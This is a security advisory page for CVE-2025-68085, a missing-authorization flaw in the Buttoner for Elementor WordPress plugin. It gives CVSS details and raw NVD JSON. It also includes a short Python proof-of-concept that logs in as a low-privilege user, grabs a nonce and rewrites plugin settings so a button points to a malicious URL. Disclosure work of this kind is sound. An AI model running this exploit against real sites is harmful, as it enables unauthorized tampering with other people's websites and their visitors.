Security Vulnerability Report
中文
CVE-2025-68085 CVSS 5.4 MEDIUM

CVE-2025-68085

Published: 2025-12-16 09:16:04
Last Modified: 2026-04-24 20:16:25

Description

Missing Authorization vulnerability in merkulove Buttoner for Elementor buttoner-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Buttoner for Elementor: from n/a through <= 1.0.6.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Buttoner for Elementor <= 1.0.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-68085 PoC - Buttoner for Elementor Authorization Bypass # Authenticated low-privilege user can modify plugin settings import requests import re target_url = "http://target-wordpress-site.com" username = "attacker" password = "password123" # Step 1: Login to get authentication cookie session = requests.Session() login_url = f"{target_url}/wp-login.php" login_data = { "log": username, "pwd": password, "wp-submit": "Log In" } session.post(login_url, data=login_data) # Step 2: Get WordPress nonce admin_url = f"{target_url}/wp-admin/admin.php?page=buttoner-elementor" response = session.get(admin_url) nonce = re.search(r'name="_wpnonce" value="([a-f0-9]+)"', response.text) if nonce: nonce_value = nonce.group(1) # Step 3: Exploit - Update plugin settings without admin privileges exploit_url = f"{target_url}/wp-admin/admin-ajax.php" exploit_data = { "action": "buttoner_save_settings", "_wpnonce": nonce_value, "buttoner_settings": { "button_text": "Malicious Button", "button_url": "https://malicious-site.com", "button_target": "_blank" } } result = session.post(exploit_url, data=exploit_data) print(f"Exploit Response: {result.text}") else: print("Failed to obtain nonce")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68085", "sourceIdentifier": "[email protected]", "published": "2025-12-16T09:16:03.637", "lastModified": "2026-04-24T20:16:24.807", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in merkulove Buttoner for Elementor buttoner-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Buttoner for Elementor: from n/a through <= 1.0.6."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/buttoner-elementor/vulnerability/wordpress-buttoner-for-elementor-plugin-1-0-6-settings-change-vulnerability?_s_id=cve", "source": "[email protected]"}]}}